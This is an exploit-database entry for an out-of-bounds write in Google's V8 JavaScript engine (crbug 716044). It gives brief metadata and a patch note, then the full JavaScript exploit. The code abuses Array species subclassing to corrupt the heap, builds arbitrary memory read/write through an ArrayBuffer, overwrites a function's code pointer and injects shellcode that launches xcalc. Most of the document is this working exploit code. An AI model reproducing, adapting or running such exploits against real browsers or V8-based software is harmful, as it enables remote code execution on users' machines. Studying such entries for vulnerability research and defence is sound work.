V8 Out-of-Bounds Write Exploit

vendor:

V8 JavaScript Engine

by:

Unknown

7.5

CVSS

HIGH

Out-of-Bounds Write

119

CWE

Product Name: V8 JavaScript Engine

Affected Version From: Not specified

Affected Version To: Not specified

Patch Exists: YES

Related CWE: Not available

CPE: cpe:2.3:a:google:v8:*:*:*:*:*:*:*

Metasploit:

Other Scripts:

Platforms Tested: Not specified

2017

V8 Out-of-Bounds Write Exploit

This exploit targets a vulnerability in the V8 JavaScript engine, specifically an out-of-bounds write bug. By manipulating certain arrays and memory layouts, the exploit is able to write to memory locations outside of the intended bounds, potentially leading to arbitrary code execution. The exploit takes advantage of a bug reported in the Chromium bug tracker (https://crbug.com/716044).

Mitigation:

The vulnerability was fixed in a patch by the V8 team. Users are advised to update to the latest version of V8 to mitigate this issue.

Source

Exploit-DB raw data:

// Source: https://halbecaf.com/2017/05/24/exploiting-a-v8-oob-write/
//
// v8 exploit for https://crbug.com/716044
var oob_rw = null;
var leak = null;
var arb_rw = null;

var code = function() {
  return 1;
}
code();

class BuggyArray extends Array {
  constructor(len) {
    super(1);
    oob_rw = new Array(1.1, 1.1);
    leak = new Array(code);
    arb_rw = new ArrayBuffer(4);
  }
};

class MyArray extends Array {
  static get [Symbol.species]() {
    return BuggyArray;
  }
}

var convert_buf = new ArrayBuffer(8);
var float64 = new Float64Array(convert_buf);
var uint8 = new Uint8Array(convert_buf);
var uint32 = new Uint32Array(convert_buf);

function Uint64Add(dbl, to_add_int) {
  float64[0] = dbl;
  var lower_add = uint32[0] + to_add_int;
  if (lower_add > 0xffffffff) {
    lower_add &= 0xffffffff;
    uint32[1] += 1;
  }
  uint32[0] = lower_add;
  return float64[0];
}

// Memory layout looks like this:
// ================================================================================
// |a_ BuggyArray (0x80) | a_ FixedArray (0x18) | oob_rw JSArray (0x30)           |
// --------------------------------------------------------------------------------
// |oob_rw FixedDoubleArray (0x20) | leak JSArray (0x30) | leak FixedArray (0x18) |
// --------------------------------------------------------------------------------
// |arb_rw ArrayBuffer |
// ================================================================================
var myarray = new MyArray();
myarray.length = 9;
myarray[4] = 42;
myarray[8] = 42;
myarray.map(function(x) { return 1000000; });

var js_function_addr = oob_rw[10];  // JSFunction for code()

// Set arb_rw's kByteLengthOffset to something big.
uint32[0] = 0;
uint32[1] = 1000000;
oob_rw[14] = float64[0];
// Set arb_rw's kBackingStoreOffset to
// js_function_addr + JSFunction::kCodeEntryOffset - 1
// (to get rid of Object tag)
oob_rw[15] = Uint64Add(js_function_addr, 56-1);

var js_function_uint32 = new Uint32Array(arb_rw);
uint32[0] = js_function_uint32[0];
uint32[1] = js_function_uint32[1];
oob_rw[15] = Uint64Add(float64[0], 128); // 128 = code header size

// pop /usr/bin/xcalc
var shellcode = new Uint32Array(arb_rw);
shellcode[0] = 0x90909090;
shellcode[1] = 0x90909090;
shellcode[2] = 0x782fb848;
shellcode[3] = 0x636c6163;
shellcode[4] = 0x48500000;
shellcode[5] = 0x73752fb8;
shellcode[6] = 0x69622f72;
shellcode[7] = 0x8948506e;
shellcode[8] = 0xc03148e7;
shellcode[9] = 0x89485750;
shellcode[10] = 0xd23148e6;
shellcode[11] = 0x3ac0c748;
shellcode[12] = 0x50000030;
shellcode[13] = 0x4944b848;
shellcode[14] = 0x414c5053;
shellcode[15] = 0x48503d59;
shellcode[16] = 0x3148e289;
shellcode[17] = 0x485250c0;
shellcode[18] = 0xc748e289;
shellcode[19] = 0x00003bc0;
shellcode[20] = 0x050f00;
code();